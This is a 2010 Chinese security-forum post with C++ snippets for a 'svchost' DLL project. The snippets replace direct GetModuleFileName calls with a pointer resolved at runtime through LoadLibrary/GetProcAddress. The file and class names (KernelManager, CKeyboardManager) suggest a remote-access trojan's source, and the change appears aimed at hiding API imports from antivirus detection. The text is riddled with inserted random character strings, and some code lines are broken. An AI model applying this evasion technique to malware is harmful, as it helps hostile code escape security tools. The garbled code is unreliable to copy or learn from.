Board logo

标题: [原创文章] 全局动态调用 [打印本页]
作者: ice_xke    时间: 2010-10-19 12:30     标题: 全局动态调用

全局动态调用笔记5 e# j; x2 w+ D
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
4 M# {* \2 ^; l, r3 U8 m1 A----------------------------------------) i) t/ U7 ?: _5 C0 y
DTDY.h:
8 D6 B* S& ?( H0 l* j- H
/ e" l. O3 X1 @. Y+ d6 S+ _#if _MSC_VER>10002 l( r/ h  R8 F# O+ M' P7 b, c
#pragma once
9 m3 E' @" J8 Q  {" p8 q#endif //_MSC_VER>1000
# G3 c; a6 I+ N#include<windows.h>
# b: X3 m8 K, X- Z
* b; y# h' s/ R, {; ~typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
+ d, D2 A: }2 p- u* u* N2 u$ hclass DTDY
& q- O4 z, I, Q* H/ U{
( ?+ l% ]& m3 r7 E2 dpublic:& K; m0 {7 j7 w' A- S0 k
DTDY();
3 @) V) g- o) c+ avirtual ~DTDY();$ L3 r  |5 \% h1 F0 w2 B6 w0 V" p. o
public:" t8 Q" r6 ]8 g" q/ f
static pGetModuleFileNameA MyGetModuleFileName;! y5 G& o2 j0 o( H3 z
static BOOL FunInitiallization();
" _) g5 A" t* R+ t' F+ u, F};( _, ~! t( @( b5 a
#endif
( L; F/ H2 c: p; v- b----------------------------------------
& U8 F& C9 h: W- E1 e% S
9 p- }" n- s( R7 t+ k9 SDTDY.cpp:
# r' r* o$ q" s9 E' R. D- Y. p' z$ W3 c  K
#include "DTDY.h"& q5 }3 L, @% D3 g. U3 V" p
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
$ A6 c5 {% n/ @2 Y* z* v; I( |  g8 _DTDY:TDY()' P3 \$ d  o! v* d
{
4 J4 _! Z7 G) S( w}
8 `# w% v* Z9 N) b; U6 T: R; tDTDY::~DTDY(). V" Z; _( w- c* S: }
{
* x7 {# L+ O- ]& V6 a}) T" u$ q2 i+ F+ W4 T9 V4 p
BOOL DTDY::FunInitiallization()
6 m% L/ }( w# ^1 p2 F; c{
% c' m) |  n" X' Y/ w* NHMODULE hModule=LoadLibrary("kernel32.dll");* d# c' K1 c" x8 T) C% p4 R
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");4 c% x3 ]# L( y. u) B
if(!MyGetModuleFileName=) return FALSE;
0 t% L% Z( T# ?% a
; V$ [7 B& f5 S  m% [4 X% `return TRUE;! q$ F# t) G; S2 [$ N
}
+ w' k: {9 q$ S; b+ p% W----------------------------------------
& A) `7 V; ~  ~, Y0 t/ W2 osvchost.cpp:! ?  w* Q) y2 S# k% h1 D4 k

! S( L2 X* N, R! Q( e#include "DTDY.h"
+ m4 g$ E" O" u% _9 L) T6 e+ X& D- U  m: v6 B9 V
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
0 R3 s" d& b( L1 n+ g7 A{
% e1 M4 y3 H9 R( T. s: S' C. tswitch(ul_reason_for_call)
" R0 I  W9 `- B) E% Q{; f, ^' B" ~: i( c; ^) {
case DLL_PROCESS_ATTACH:- ~: q6 f' B' u& g  e- p: R
if(!DTDY::FunInitiallization()) return FALSE;
2 R. U  d( z6 X7 ~
8 x! T3 \+ B  _% B* u6 Gbreak;
( T# @6 E! }9 s4 e! q}7 x7 o4 ~" e6 J% `7 D3 d! G9 I. }) d
}, t7 O) @8 r1 @  y9 p  Z2 c
* Z* |- @1 n+ \" U! h  }
$ R7 \* M: r( O! A) \. l8 P) t
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
- n0 q7 Z) t, k, G1 p' x改写为5 q) T. u1 x* b
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));! r3 R# m, c( s$ K( w2 I/ \
----------------------------------------  R' {7 j8 F' G8 A- [  G
KernelManager.cpp:
2 Z4 u# e/ k9 j% T3 j" r* R, F8 C/ m3 g3 r" |
#include "../DTDY.h"
) W+ {+ e0 k& vGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));7 _* c: N1 A8 S0 C/ W
改写为! O% F) G+ s; p) s4 e
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));! z8 [9 D, `# c  G. ^3 v6 \7 O
----------------------------------------



欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2